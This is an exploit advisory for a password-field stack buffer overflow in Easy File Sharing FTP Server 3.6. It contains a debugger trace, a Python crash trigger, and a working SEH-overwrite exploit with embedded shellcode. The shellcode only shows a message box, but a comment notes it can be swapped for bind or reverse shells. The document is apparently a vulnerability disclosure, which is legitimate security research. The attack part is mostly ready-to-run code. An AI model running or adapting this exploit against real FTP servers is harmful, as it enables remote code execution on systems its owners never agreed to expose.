# Exploit Title: Easy File Sharing FTP Server 3.6 (0day) - Stack Overflow # Date: 13-12-2015 # Exploit Author: @zeifan # Vendor Homepage: http://www.sharing-file.com/products.htm # Software Link: http://www.efssoft.com/efsfs.exe # Version: 3.6 (REQUIRED) # Tested on: Windows 7 SP1 x86 # CVE : No CVE (Vendor contacted, no response) 1. Description =============== To trigger the vulnerability, we need to send buffer more than 3000 bytes. Vulnerable part is the "PASS" input. So in this case the target should be like e.g. (Python): reqftp += "A" * 3000 ... code cut here ... s.send("PASS " + reqftp + "\r\n") However, before sending the buffer to "PASS" input, we need to escaped a character by using "\x2c", example below. Further info, https://www.cleo.com/support/byproduct/lexicom/usersguide/ftp_configuration.htm. reqftp = "\x2c" + "A" * 3000 Upon overflowing, it will stop here at this function: 0046C18C /$ 56 PUSH ESI 0046C18D |. 57 PUSH EDI 0046C18E |. 8B7C24 0C MOV EDI,DWORD PTR SS:[ESP+C] 0046C192 |. 8BF1 MOV ESI,ECX 0046C194 |. 8B0E MOV ECX,DWORD PTR DS:[ESI] 0046C196 |. 8B07 MOV EAX,DWORD PTR DS:[EDI] 0046C198 |. 3BC8 CMP ECX,EAX 0046C19A |. 74 39 JE SHORT fsfs.0046C1D5 0046C19C |. 8379 F4 00 CMP DWORD PTR DS:[ECX-C],0 0046C1A0 |. 7D 0B JGE SHORT fsfs.0046C1AD 0046C1A2 |. 83C1 F4 ADD ECX,-0C 0046C1A5 |. 3B0D 78A04900 CMP ECX,DWORD PTR DS:[49A078] ; fsfs.0049A07C 0046C1AB |. 75 06 JNZ SHORT fsfs.0046C1B3 0046C1AD |> 8378 F4 00 CMP DWORD PTR DS:[EAX-C],0 <--- EIP Continuing the execution by pressing "Shift + F9" (Immunity Debugger) will overwrite the EIP, e.g. (Register): EAX 00000000 ECX 41414141 EDX 777771CD ntdll.777771CD EBX 00000000 ESP 04279D18 EBP 04279D38 ESI 00000000 EDI 00000000 EIP 41414141 Below are the proof of concept to trigger overflow as well to control the EIP. # Trigger overflow import socket, sys if len(sys.argv) <= 1: print "Usage: poc.py <target_ip> <target_port>" exit(1) ip = sys.argv[1] port = int(sys.argv[2]) reqftp = "\x2c" + "A" * 3000 reqftp += "\x42"*30 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.recv(1024) s.send("USER anonymous\r\n") s.recv(1024) s.send("PASS " + reqftp + "\r\n") s.recv(1024) s.close() 2. Proof of Concept (Working Exploit - SEH) # Crafted for fun and polishing skillz! # @zeifan import sys, socket, struct if len(sys.argv) <= 1: print "\nEasy File Sharing FTP Server 3.6 Stack Overflow - @zeifan" print "\nUsage: poc.py <target_ip> <port>\n" exit() ip = sys.argv[1] port = int(sys.argv[2]) # Shellcode can be change to any (bind, reverse, etc.) # Hello World MessageBoxW Shellcode # https://www.exploit-db.com/exploits/37758/ shellcode = ("\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b" + "\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09" + "\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d" + "\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03" + "\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81" + "\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04" + "\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03" + "\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3" + "\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68" + "\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68" + "\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9" + "\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65" + "\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01" + "\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68" + "\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68" + "\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68" + "\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57" + "\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c" + "\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78" + "\x69\x74\x54\x53\xff\xd6\x57\xff\xd0" ) # Escaped character + Buffer reqftp = "\x2c" + "\x41" * 2559 # 16 bytes SEH reqftp += "\xeb\x10\x90\x90" # 0x100182d3 : {pivot 8 / 0x08} # POP EBP # MOV EAX,1 # POP EBX # RETN reqftp += struct.pack("<I", 0x100182d3) reqftp += "\x42" * 100 reqftp += shellcode s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) print "\nMessageBox will pop up!" s.recv(1024) s.send("USER anonymous\r\n") s.recv(1024) s.send("PASS " + reqftp + "\r\n") s.recv(1024) s.close() 3. Solutions No solution as the affected software are the latest update (at least from the site). *** Shout to Yeh, yodan, Lai, KS, t1nk3r, JinJin ***